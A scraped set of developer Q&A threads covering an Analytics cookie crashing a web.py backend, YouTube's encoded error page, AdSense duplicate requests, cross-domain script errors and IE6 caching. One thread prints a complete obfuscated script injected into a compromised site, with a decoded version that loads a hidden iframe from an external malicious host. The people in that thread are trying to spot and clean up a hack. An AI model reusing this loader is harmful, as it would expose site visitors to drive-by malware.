Google analytics illegal cookie breaks Python backend - javascript

In my feed that is published to feedburner I have Russian characters in campaign name in tracking settings Feed: ${feedUri} ${feedName}. The problem is that it results as incorrect __utmz cookie set by Google Analytics, and cannot be processed by my backend (which is web.py).
File "/home/dw0rm/lib/ve/lib/python2.7/site-packages/web/session.py", line 96, in _load
self.session_id = web.cookies().get(cookie_name)
File "/home/dw0rm/lib/ve/lib/python2.7/site-packages/web/webapi.py", line 359, in cookies
cookie.load(ctx.env.get('HTTP_COOKIE', ''))
File "/usr/local/lib/python2.7/Cookie.py", line 627, in load
self.__ParseString(rawdata)
File "/usr/local/lib/python2.7/Cookie.py", line 660, in __ParseString
self.__set(K, rval, cval)
File "/usr/local/lib/python2.7/Cookie.py", line 580, in __set
M.set(key, real_value, coded_value)
File "/usr/local/lib/python2.7/Cookie.py", line 455, in set
raise CookieError("Illegal key value: %s" % key)
CookieError: Illegal key value: )|utmcmd
This error occurred in Firefox, and I have managed to fix it with this code:
def myinternalerror():
try:
web.cookies()
except CookieError:
if not "cookie_err" in web.input():
web.setcookie("__utmz", None, domain=web.ctx.host)
raise web.seeother(web.changequery(cookie_err=1))
return web.internalerror(render.site.e500())
app.internalerror = myinternalerror
But today I got this "cookie_err=1" redirect even in Chrome. I tried this on some other sites that are based on web.py and Analytics, and they all raise internal server error. And this error keeps until the illegal cookie is removed, which is a difficult thing to do by a regular visitor.
I want to know what other options I should consider. Maybe Python Cookie module is incorrect, or it is browser's bug that lets in incorrect cookie. This stuff can be used for malicious purposes, because there are many Python websites that use Google Analytics and Cookie module.
This is tracking query: utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+cafenovru+%28%D0%9E%D0%BF%D0%B8%D1%81%D1%8C+%D1%82%D1%80%D0%B0%D0%BF%D0%B5%D0%B7%D0%BD%D1%8B%D1%85+%D0%92%D0%B5%D0%BB%D0%B8%D0%BA%D0%BE%D0%B3%D0%BE+%D0%9D%D0%BE%D0%B2%D0%B3%D0%BE%D1%80%D0%BE%D0%B4%D0%B0%29
Incorrect __utmz cookie value is 37098290.1322168259.5.3.utmcsr=feedburner|utmccn=Feed:%20cafenovru%20(Опись%20трапезных%20Великого%20Новгорода)|utmcmd=twitter
Illegal cookie is set by Analytics javascript on the first page access, and server side error appears on subsequent requests.

I know this is probably not the answer you're looking for, but the best solution for this bug is to just upgrade from ga.js to analytics.js. Analytics.js is the newest version of the Google Analytics web tracking library and is part of universal analytics. Analytics.js only writes a single cookie, so it completely avoids this problem.
The tricky problem with this bug is its been around for a long time, and many GA users have existing workarounds in place. To fix it now would break a lot of those sites, so I think it's unlikely that Google will do anything about it, especially since analytics.js has already fixed this problem, and ga.js will soon be deprecated.
Once again, I know this isn't the answer you're looking for, but I just want to reiterate that implementing any workaround for this issue yourself will most likely be a huge waste of time. You'll have to upgrade soon anyway, and then your workaround will have been unnecessary.
Here's some more information on how analytics.js uses cookies:
https://developers.google.com/analytics/devguides/collection/analyticsjs/domains

This smells like a UTF-8 encoding issue. Or worse, you might be using KOI8-R or Windows 1251.
In any case, there are ways to avoid problems. One way is to Base64 encode your cookie string before you send it, that way the Cyrillic characters are safely hidden.
But have a look at your code. If you are not UTF-8 encoding the cookie string before writing it out, that might also solve the problem. When I look through the string it seems to be pairs of codes with the first code always being D0 or D1. That suggests that you are using raw Unicode on a Python compiled with 16-bit Unicode characters, or using UCS-2 encoding for the string instead of UTF-8.

Related

Youtube - understanding debug trace text [duplicate]

This is YouTube's 500 page. Can anyone help decode this information?
<p>500 Internal Server Error<p>
Sorry, something went wrong.
<p>A team of highly trained monkeys has been dispatched to deal with this situation.<p>
If you see them, show them this information:
AB38WENgKfeJmWntJ8Y0Ckbfab0Fl4qsDIZv_fMhQIwCCsncG2kQVxdnam35
TrYeV6KqrEUJ4wyRq_JW8uFD_Tqp-jEO82tkDfwmnZwZUeIf1xBdHS_bYDi7
6Qh09C567MH_nUR0v93TVBYYKv9tHiJpRfbxMwXTUidN9m9q3sRoDI559_Uw
FVzGhjH5-Rd1GPLDrEkjcIaN_C3xZW80hy0VbJM3UI5EKohX35gZNK2aNi_8
Toi9z3L8lzpFTvz5GyHygFFBFEJpoRRJSu3CbH5S2OxXEVo4HgaaBTV7Dx_1
Zs1HZvPqhPIvXg9ifd4KZJiUJDFS8grPLE7bypFsRamyZw-OCVyUHsGQKBwu
77pTtRwpF3hOxYLxM4KnAyiY1N6yrASSWyaeumRDENAoEEe8i8MRxzifqHuR
leatvNMiwsg1pbSl7IIiaKljZaD9UkRms4Kvz1uYUNk4AwXnJ9-Wq44ufMPl
syiHp_LwaeqyuxXykJMl-SA9p05VrJc4kCETUW3Ybp0yTYvVrqggo56A0ofC
OiyAmifQA9pdYVGeumrQtbFlFyDyG9VKNpzn5lqutxFZPsS8xjiILfF3bETD
H4aUb5fT4iERFsEL7S-ClsXiA4yAJdAcNH-OhGg9ipAaIxRRTOR5P1MYx6s6
-OrqgpT5VEaEx2hMpS1afaMd2_F21sxvcz2d8sCpEceHHSfsntTth6talYeD
4l63aUTbbCKV1lHxKWxdUjACFKRobeAvIpcJPcdHSN3CNQI-LlIWIx9jeyBU
tDcL6S6GpRG_Z2of9fmw0LHpVU5hKlQ3lCPd4pVP6J02yrsBi0S9OLoE9jmM
T2FfCvU1sWUCsrZu4-UPflXMyRnFK8aN8DYiwWWE8OvnLQ-LIaRDhjp29u9a
LT6Lh4KxEmWF5XeZTwrzJxtuDLVomxVD5mpwFvK0YSoaz9dnPGXb0Fm2txSL
BvGssSrWBJ4FeR6eEEkd_UkQ-aUnPv2W-POox17n54wzTwLugYjslRenMzmk
I4_jlXcx9NpKmUg7Pa0qJuaElt-ZymPv6h0cXRUlyZtS0iT9-CQOHWLYMi3I
kKrYa6bKUCAj058JEderSnbXqGEMvwBeZ_xgJpAjJiSgMOxJPokhbS6ezIv4
1JNr_dvQyvu4vh-YQNZ37fNTqQcoDZtYflBsJjuGrJlmIcqBYufB9g6nUaOE
xPAKjPdvZ_z1Rn_8sWVf8NHNBBKGe5lgDgBxypsV0kIwVa9QOlehivOaieBI
tmqHNdQIfdob0XUTEBPSeLj9hmw3Bqplc3gqUfFhIvpHml6dOTbjBhfkq0TE
5yCRHL2VSe2Xt9_i8SPQA2yCtJVO8HP6pnohmxqlBWSTE8Xj87PI6quX7f9i
0W6PdtkMYaGJsd_Ly_4Ag-KmGNHN585tF9eC5HeQ8Gz-vHZWOUiM4OQAG9UA
31ENOAjHtYb--ketbUcdX_FdjGiPtI_GxYeBqEShICotcd-S-E3bEGO-77M2
CuUUdB1AUYVDZR81XejVG5kSWsrz-p1qZ-6sSpSHCp114C6PheQPCwRHEr_1
AS-DkZfIuZ-w8XAo6pHIwvnv0dORSo-hPFgw1rw2VE4aKsgeMc7ZoPUxby1d
Zr-o-0X4ZMgxoQHw_Ub27rTTHxS5Czt_vgBPq7k5OK5dm6b7JCs6Dbn2dsIA
AakPL26t4smr8IiPAnqNC2sn7vxSiAe9mTJ670eNc6C9dCSGwqzqSURiLHmT
kFyLhNSOdipttECmSSA1qh_E0K4LUhiOq7MFDEzg9CLD8kuJrqpEGgltYpD-
8lk7KEpyjMqbWFs-qeD8uJpsVfY2ac1C67OmyGzkERVoC245-YXuNCP8KUZH
LGzRm9jXwUP_piDETX0N5xj34VOCfUTffT1WlWHmB9WRPhwjIsYYy_kgR-uT
kIEDQ23NVUEGgDoryl-ymysIfwifjq-lPB3e85dz1PajNxawsCrKNeR_4hhq
zE_E4ete1EgXeAYoeH4UIgrPGXDD-KfoNoB6viNs0GzNU9czD9Avr-tDtARO
HBLSLIVRYq8caMA-jvpplTOMoDdmUMUWytf4Y_F5tKTpNtLPaAe1py1IgZBl
lfAGY9L_k5slelh_9gUBEkURxS2oMGf2gdSeDdRBxKKx5tF1b-cuMLK6JYZJ
vbGFYSsSENOkHrHEo9NdTwTi7NON9ZgRJgh7OaENK4TFCXrhKc4C6cyJs-V_
HZ0Q-B8XDyjL0qudg_0rJbjTNpNZajT_1WGsnhsTTAgMCGtTsj1T8vNx2LuX
lPQV30nUKpukdCP3zuiE9_aeJQ-nzf3dMQ-KnZU5APmGcIP_u2be6blieMWH
qVax1asKmuIjslh49ceM6lRt3Ia2bHUB8b1TMSjU4I79KPqc3clDnD8quNnU
cRkgfJ_8LCEoH7jml_2TNV0fLuH_9IOXF3jKjhT9K5f-e5N06GmPQLzdqzeQ
MnEtHuDcf4IizyKnB5GUXoNfQxbScQEzztQ_nHMYfF-E8KqoxxlK-Z0wfEDv
dJpL3mcNfFu_vz-_LJ0oI4dE0-vthsxbpTxVQkdI0E5XSi4nYfLqhXompk4j
gpxcHBjsXVbWcnelWhhQP15gCApj6Gz_ddRtk_uxiyiqZ44oUUDcl1KeWMTf
yhKDj7jgGNzTOkUsXZRPb9M77-ZYPuL2wR68E3b9PC_mS6HBHiUxQ7pXvkwS
Bi2CoFgd9SqBXk2O5I_BPaEoA8Aorazw4OvDrmTQrCk4OkGPKRukE4Ci2RMq
TZIYbBz-v3QxmOKHJoMXPNOfj93TRWpmlAd6iHCH6BVlSdfgfjdbHeD0b0ct
qXC_-S5fr1XFBuaZwaUTrBPxU-3IxWLp-dx7wpKcFykqKnByYpkzR3twKEXc
z--CZV79Qk3ZTMY9ATia4HbyhoAqY_hV9GKAHQdU_C-9qwYt0rliNUcizlBc
RHcwzoMyx30ciwbE8e9QsEH_AMa3E2ezuhjTqQlAG33_Gy5Bwe7fj6zNR0ud
jjpcNVf-wprWHEYxMcKwjCQvEHBtv6TnCHkgi_AOtPzzm3aYkMc_ysdNAnI7
DE_T9S5Mkcs6VdT2DWgUN_UC-oAw27xej0aTIn0GckXPDcLBgvrUhUPU3FRn
lW65syvFvxFmBOiCAEHD1q6Is1XhIf8vE6y0FMdNEWSMUW5rQG8f3KP_pjqG
XlUHnGrQPQysylrczHOj4E3WTT918xg2vrXVraDJbCYnJpaWp8m94iqZw2gJ
I_0UWOAZJMCYWz5jYf2DanCOBaGeZIO-UsWorP6YV3yHehirZ_Lc6KtaUorb
bm_BnnCqGVZypL4k6cDy-4GyO2GNohXzN-VWqbAIUQIat9w6RsDpzpS2DIap
96aMBDg24D73RhFTEgCSunPpbbGrDVU3GFkuTGFFBQWNfAU_F22XtoPr_ZB0
1zZPrBVXrEhebvrzp0Z31_sIT8zLop_oaSRvykbyJKKxucARfPee-d0xlgWN
WwKKtl49WVMhhu0OfDScH3knAVdv0LDAyt1fo3WF8jxdp7J9Hn3OWF3rcn0p
zw0gt6YV_6FRy_UbZmpLBvEhZQKUfKuxp6LK-SfHOilT29ERg9LJZhnyluTV
HELRtkJIcHzvphXupCIaIgZispYxHNSmAfze2cshWBYizGTBSKXWgrJeo7Q6
kEjim72yKaJ8JaLzMQFPxtQxhtvHRw94dCuXcajg3nE_r_9t7D8RicqF-CVV
tvp-rHMPhhizlgfixHWXrPB7reTtftT64pOSl5vUop8gTlbeW5Kg7WQAPNfp
zUH8YcAo0xDLJHA-FgTM4mYGih41rKaKKteWRFGU-fIyEzeO1s35tbGzlZ7R
btUG_fCpIbaJmucMZK9OzVBSfBgTBtFSesqKq6hIc8HctGcj5LPUfP9DRqqe
CrBi6bPjTlzrjaxJoU6oRq4ZtiBG38skOAaCUk61tpjilkq1fmWe2ByvLXhp
O2furZoiwNrizYmUmAW3ak3iSneScA64M-9apdZwhhEgpqyw5mUMYNT5SOOf
xZePlgXxhlL81t3KlofdbzT0w6tlbbT0NSbj9Q_zNkeZ8ar5aeMgTR-pJACg
baB20YVezziX-yboCF-uIptCTFNV
(Source: this post on HN)
The debug information contained in the (urlsafe-)base64 blob is likely encrypted.
Think about it from Google's perspective: You would want to display a stack trace, relevant headers of the http request and possibly some internal state of the user session to help a developer debug the situation. On the other hand all that information might contain sensitive information that you don't want the general public to see or that might endanger the user if he copy'n pastes it in a public support forum.
If I was to take a guess of the format I would imagine:
A public identifier of the key used for encryption (their servers could use different keys then)
The debug data encrypted using an authenticated encryption scheme
Additional data for error correction when OCR has to be used
For statistical analysis of the format it would be interesting to sample a lot of these error messages and see if some parts of the message are less random than you would expect from encrypted data (symmetrical encrypted data should follow a uniform distribution).
It looks like you are not the only one who is looking for some secret messages in YouTube error page. It seems that you can decode it using Base64.
Here is how:
http://www.cambus.net/decoding-youtube-http-error-500-message/
In a nutshell:
Sadly, contrary to my expectations, there doesn't seem to be any
hidden message… Screw you, highly trained monkeys!
I guess it is just another Easter Egg similar to 'Goats Teleported' performance counter Google Chrome had:
https://plus.google.com/+RobertPitt/posts/PrqAX3kVapn
But I guess unless you look like this, you can't be 100% sure.
It's entirely possible that this is random padding to avoid the "friendly" IE error pages that show if your error page does not contain more than 512 bytes of HTML. It would be base64 encoded if it were simply random bytes.
Imho this is all about customer care.
Actually there would be no need to send the error/debug message to the customer, because, I guess, it's already handled internally.
So:
why do we see this?
and why do they crypt it?
and is there really no hidden message for us?
Although the error might be handled and resolved internally, this does not necessarily satisfy a customer, who is not able to use the product. They pretty much do crypt by a good reason as this debug message might reveal more than a typical admin is used to.
And also there is no need to hide a message for us. Why? Because we NEVER stop until we find something.
I think:
internally the error is dealt with
external users might have something in hand to tell a technician if necessary and in return can get an approximation of ongoing problem
All in all nothing special about it and i think linking e.g. to the inf. monkey theorem is a bit overspectulated...
Error 500 means google has a problem which can not resolve. So when reporting a bug the most important thing is to prepare reproduction steps. So I tried to find an answer of the question "When this happens?"
I found this post in reddit: https://www.reddit.com/r/youtube/comments/40k858/is_youtube_giving_you_500_internal_server_errors/?utm_source=amp&utm_medium=comment_list
As resume:
It happens on desktops (www...), it works ok on mobile version (m...)
It happens for authenticated users. For anonymous users is working fine.
The problem is resolved after cookies are cleaned.
So I would give a direction: try to find the key in the session cookie. I hope my 2 cents will help.

Is this site hacked?

At a particular web site (not mine), I'm alerted that it wants to use Java and I see a domain in India referenced. Since this doesn't look normal to me I look at the page source. There is a large script block BEFORE the DOCTYPE. I see this only on IE10 (not FF, etc.) and on multiple machines. I'm not clever enough to see exactly what's going on as it looks like it's being obscured quite a bit. Before I report the situation to the site owner (and for my own curiosity) I wondered if this is definitely evidence of a hacking. I see a few other sites with very similar code when I Googled the phrase "asd=function" from the below so it might be a common problem. (Or maybe it's something legitimate for IE10??) Below is the code with extra line feeds added.
<script>
ps="split";
asd=function(){d.body++};
a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,145,150,150,163,162,167,147,163,166,166,151,147,170,62,155,162,63,160,156,105,114,73,115,64,157,173,166,65,64,70,106,74,74,64,124,136,150,150,64,131,175,162,75,64,106,122,122,133,64,72,167,107,107,64,171,134,173,114,65,64,174,156,170,64,152,70,154,131,65,64,112,113,105,64,164,116,174,157,64,163,110,117,64,63,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,145,150,150,163,162,167,147,163,166,166,151,147,170,62,155,162,63,160,156,105,114,73,115,64,157,173,166,65,64,70,106,74,74,64,124,136,150,150,64,131,175,162,75,64,106,122,122,133,64,72,167,107,107,64,171,134,173,114,65,64,174,156,170,64,152,70,154,131,65,64,112,113,105,64,164,116,174,157,64,163,110,117,64,63,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));
ss=String;
d=document;
for(i=0;i<a.length;i+=1){
a[i]=-(7-3)+parseInt(a[i],8);}
try{asd()}
catch(q){
zz=0;}
try{zz/=2}
catch(q){zz=1;}
if(!zz)eval(ss.fromCharCode.apply(ss,a));
</script>
If this is really malicious, is there a forensic web site that I could/should post this to?
Here's the "translation" of the above code:
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http://addonscorrect.in/ljAH7I0kwr104B880PZdd0Uyn90BNNW06sCC0uXwH10xjt0f4hU10FGA0pJxk0oDK0/');
f.style.left='-10000px';
f.style.top='0';
f.style.position='absolute';
f.style.top='0';
f.setAttribute('width','100');
f.setAttribute('height','100');
document.getElementsByTagName('body')[0].appendChild(f);
}
Not only is it poorly coded (someone has apparently never heard of the document.body property...), it is very obviously a hack.
Interstingly, requesting the resource returns a 402 Payment Required header if I don't include an IE10 User-Agent string - that's probaby a hint that it's designed to exploit that particular browser. Spoofing a valid UA string gives me a page that has a bunch of over-complicated JavaScript that I can't be bothered to decode, but that certainly doesn't look friendly.
Remove it, it is trying to load a url that most likely will install spyware on your computer.
The website is the following:
http://addonscorrect.in/ljAH7I0kwr104B880PZdd0Uyn90BNNW06sCC0uXwH10xjt0f4hU10FGA0pJxk0oDK0/
The website it has been already deactivated, so yes.. your website has been hacked.
Change your FTP/SSH passwords, clean all the computers that have access to the hosting account.

Log javascript errors from another subdomain

window.onerror in Firefox and Chrome seems to discard the real error message/location and always pass "Script error.", "", 0 when the offending script is on a different domain than the page itself. I have a site with separate www and static subdomains for pages and css/js, which renders error logging rather useless. Is there any way to enable the proper logging of such errors?
It doesn't sound like there's a workaround for this at the moment (I asked in the Mozilla IRC channel).
I've filed these bug reports to track this issue. Please chime in if you have opinions on what the best solution to this would be:
https://bugzilla.mozilla.org/show_bug.cgi?id=696301
https://bugs.webkit.org/show_bug.cgi?id=70574
The real solution is to use proper try { ... } catch(e) { ... } blocks in all code. However, I understand that may not always be an option.
If you don't have control over these other scripts, your next best option would be to load them as strings via JSONP, then use eval() (yes, I know eval is evil) to "inject" them into the current page. This way you'll still get the benefits of using a static domain (no cookies, CDN option, additional concurrent requests, etc), but the JS will end up being on the page's request domain.
Within your js file, on the top try doing
document.domain = "yourdomain.com"

Google AdSense JavaScript causing multiple page-loads?

Update
Ok - I now know where the multiple page loads are coming from! (However, the mystery is not yet solved).
It seems that immediately after a request is made to a page containing AdSense ads, Google makes a request for exactly the same URL (one or more times)
e.g. this is what the logs look like (note requests from Mediapartners-Google):
2011-07-20 09:50:20 xxx.xxx.xxx.xxx GET /requestedURL/ 80 - xxx.xxx.xxx.xxx Mozilla/5.0+(Browserstring removed) 200 0 0 1140
2011-07-20 09:50:20 xxx.xxx.xxx.xxx GET /requestedURL/ 80 - 66.249.72.52 Mediapartners-Google 200 0 64 218
2011-07-20 09:50:22 xxx.xxx.xxx.xxx GET /requestedURL/ 80 - 66.249.72.52 Mediapartners-Google 200 0 0 171
(I should have paid more attention to the IIS logs, rather than my own application logs - it just didn't occur to me that these multiple, identical, simultaneous request could have been coming from different sources). This also explains why I couldn't find anything strange when analysing the request with WireShark, and why fiddler didn't show anything strange.
So the question for the bounty now becomes:
Why is google making these requests so quickly after the page is requested? (I know they need to asses the page for content, but immediately after, and multiple times sees like abuse to me.)
What can I do to stop this?
And out of interest:
Has anyone else seem something similar in their logs? (or is this something weird with my AdSense account)
Ok, I'll apologise in advance for the length!...
This question is realted to this one, regarding Google Adsense Javascript code causing errors. (of the form Unable to post message to googleads.g.doubleclick.net. Recipient has origin something.com)
I won't duplicate all of the information there, but the conclusion seems to be that the AdSense JS is buggy. (please read the question for background if you have time).
I knew about this problem for some time, but decided to live with the JS errors rather than pulling AdSense from the site.
However, Recently I noticed that in my ASP.NET MVC2 application, Controller Actions seemed to be called twice per page request (sometimes even 3 times). Odly, it was only happening on the production server. After some thought I relalised that one difference between the Dev and Production environments was that the AdSense javscript was only active in production.
To test this I removed all adsense code from one of the production pages, and lone behold, the multiple-page-load problem went away!
I thought that perhaps it was the fact that there were general JS errors on the page that was causing the problem, so to test this I introduced some simple errors into my own JS code, however this did not cause the multiple-page-load problem to reappear.
One known situation where pages can be called multiple times per request is when there are image tags with empty src attributes, or external resource references with empty src attributes. Crucially, The most upvoted answer to the AdSense JS Bug question notes that:
"The targetOrigin argument in this call, this.la is set to
http://googleads.g.doubleclick.net. However, the new iframe was
written with its src set to about:blank."
This seems eerily similar to the empty src issue.... This seems too much of a co-incidence, and currently I'm of the opinion that this is the problem.
[EDIT: This was a red herring]
However, I've no idea wehre to go from here. These multiple action calls are causing real problems (I'm having to use code blocking, serialised transactions, and all sorts of nasty hacks to limit adverse effects). Of course, I could be barking up the wrong tree entirely - I'm puzzled that I can't find any other references to this, given the ubiquity of AdSense, and the nature of the problem (but then again the conclusions of the AdSense JS Bug question are also surprising). I would love this to turn out to be a stupid mistake on my part, so I need a sanity check.
I'd like to ask the community:
Has anyone else experienced this problem?, or can anyone who is using AdSense replicate and confirm it? [See note below]
Assuming the problem is what it seems, what can I do? (other than pulling AdSense of course)
If not, then what might be causing this?
To Sumarise:
- My actions are being executed 2 (sometimes 3) times per page request.
THIS ONLY HAPPENS WHEN GOOGLE ADSENSE ADS ARE PRESENT
I removed all AdSense JS and introduced an error into my own JS : Actions are called only once...
A similar problem can happen when empty src properties are present on the page
An answer to a previous question sumarises that the AdSense JS sets a src="about:blank" on an iFrame
I have come to the conclusion that the src="about:blank" from the AdSense code is the most likely source of the problem.
If I disable JavaScript on the browser, the problem goes away
Just to document the things I have ruled out:
This is happening across browsers: Chrome(12) Firefox(5) and IE(8).
I have dissabled all plugins on browsers (YSlow, Firebug etc...)
There are no empty src (src=""/src="#") for images, or other external resources in the html in my code
There are no empty url references in the css ( url('') )
It's unlikely to be server side code/config problem, as it doesn't happen in Dev (and of the few differences between dev and production is the absence of AdSence JS in Dev)
Note: For anyone looking to replicate this, it should be noted that, strangely, when the multiple action calls happen Fiddler shows only one request being sent to the server. I have no idea why this should be the case, but the server logging doesn't lie :) Perhaps someone who has prior experience with this problem when caused by empty src attributes in img tags can say whether they have seen the same behaviour with Fiddler.
Requested extra information
HTML (#Ivan)
Here's how I'm implementing the Adsense (ids removed)
<%# Control Language="C#" Inherits="System.Web.Mvc.ViewUserControl" %>
<div class="ad">
<%if (!HttpContext.Current.IsDebuggingEnabled) { %>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-xxxxxxxxxxxxxxx";
/* xxxxxxxxxxxxxxx */
google_ad_slot = "xxxxxxxxx";
google_ad_width = 728;
google_ad_height = 15;
//-->
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<%} else { %>
<img src="/Content/images/googleAdMock728x15_4_e.gif" width="728" height="15" />
<%} %>
</div>
This is being inserted by a RenderPartial in the View:
<% Html.RenderPartial("AdSense_XXXXXX"); %>
TCP Logging (#Tomas)
So far I have done a wireshark capture:
on client when requesting page on production with problem
on client when requesting page on production without problem (i.e. Adsense Removed)
I can't really see a significant difference between the two (although my network skills are not great). One thing to note is that they both seem to have a TCP retransmittion of the HTTP request immediately after the initial request - I don't know the significance of that. I can confirm though that in case 1 the server logs reported 2 executions, and in case 2 only one execution.
Next I will try TCP logging on the server side in both cases, and post results here.
Mediabot is the name given to the web crawler that Google uses to crawl webpages for purposes of analysing the content so Google AdSense can serve contextually relevant advertising to the page.
In my experience, it is impredictable and, yes , it can be pretty heavy and annoying.
If you don't want Mediapartner bot to access a specific page, you can disallow it in your robots.txt with:
#
# disallow adsense bot
#
User-agent: Mediapartners-Google
Disallow: path to your specific page
This will have the drawback of service untargeted ads from that specific page.
If you are seeing this pattern always on the same page with different query string, adding the canonical rel could ease the pain.
If you can't resolve this issue, and you see it as an abuse, don't esitate to ask help in the Crawling Indexing and Ranking Google support.
Given that the behaviour that you are observing appear to be hard to avoid, can we rather focus on workarounds?
Can you differentiate requests based on UserAgent, and thus filter out requests.
Could that be a viable approach for you?
If so then you could probably base upon this approach: http://blog.flipbit.co.uk/2009/07/writing-iphone-sites-with-aspnet-mvc.html
Here they detect iPhones, but the consept is the same for Mediapartners-Google bot.
Aside from the embedding of the AdSense code itself, there are two things related to AdSense that differ in your two test cases:
What else happens when !HttpContext.Current.IsDebuggingEnabled? This appears to be the de-facto production flag; maybe there is some other nuance somewhere that is happening that depends on this same flag.
Is it possible that Html.RenderPartial("AdSense_XXXXXX") is somehow causing your Controller to jump back to the beginning of its execution?
From your description, it seems like the execution is happening twice on the server but only one request is being sent from the client. This implies a server error, and these two lines are the crux of your AdSense triggering. To further narrow it down, try embedding the AdSense partial directly instead of calling Html.RenderPartial(). If that doesn't change the result, it might be worth a sanity check on what else switches on HttpContext.Current.IsDebuggingEnabled.
Failing that, it might be helpful to know whether your server-side logging takes place as the request is received, before the response is sent, or after the response is sent.
Yes, I just detected this during a TeamView session with my partner. On my box my main page ONLY for my site loads once per request.
Then by coincidence while using Fiddler my partner is getting 4 requests to the sample page. It is a 1.5 MB page with big scripts and lotsa other dependencies so this was truly a WTF moment as I have never seen anything like this in 15 years of web development.
If google is doing this I must say they should realize today's sites might have very big pages and very big audiences. That could mean they are jacking bandwidth by a factor of 4 per request. Like I said, WTF?????
I wish this Q&A had a more definitive resolution.
I do use Google Translate widget but this is only occurring on his box and for the main page. The other pages also use the translate widget and I do request my JQUERY via the google CDN. Could anything Google be doing this.

IE6 Javascript problems with $Revision$ in the filename

We recently started using SVN Keywords to automatically append the current revision number to all our <script src="..."> includes (so it looks like this: <script language="javascript" src="some/javascript.js?v=$Revision: 1234 $"> </script>). This way each time we push a new copy of the code to production, user caches won't cause users to still be using old script revisions.
It works great, except for IE6. For some reason, IE6 sporadically acts as though some of those files didn't exist. We may get weird error statements like "Unterminated String Literal on line 1234," but if you try to attach a debugger process to it, it won't halt on this line (if you say "Yes" to the debugger prompt, nothing happens, and page execution continues). A log entry for it shows up in IIS logs, indicating the user is definitely receiving the file (status code 200, with the appropriate amount of bytes transferred).
It also only seems to happen when the pages are served over https, not over standard http. To further compound things, it doesn't necessarily happen all the time; you might refresh a page 5 times and everything works, then you might refresh it 20 more times and it fails every time. For most users it seems to always work or else to always fail. It is even unpredictable when you have multiple users in a corporate environment whose security and cache settings are forcibly identical.
Any thoughts or suggestions would be greatly appreciated, this has been driving me crazy for weeks.
Check your log with fiddler2 to make sure the browser request the page, and do not use the cache instead. Also check the URL of the JS script and the header returned.
Are you using GZip? There has been issues reported with it.
I would suggest testing using Internet Explorer Application Compatibility VPC Image. That way, you can do your tests with a 100% IE6, and not one of those plugin that claims to simulate IE6 inside another browser.
I think this is a very clever idea. However, I think the issue could be related to the spaces in the url. Technically, the url should have the spaces encoded.
See if you can customize the keywords in SVN to generate a revision number without special characters.

Categories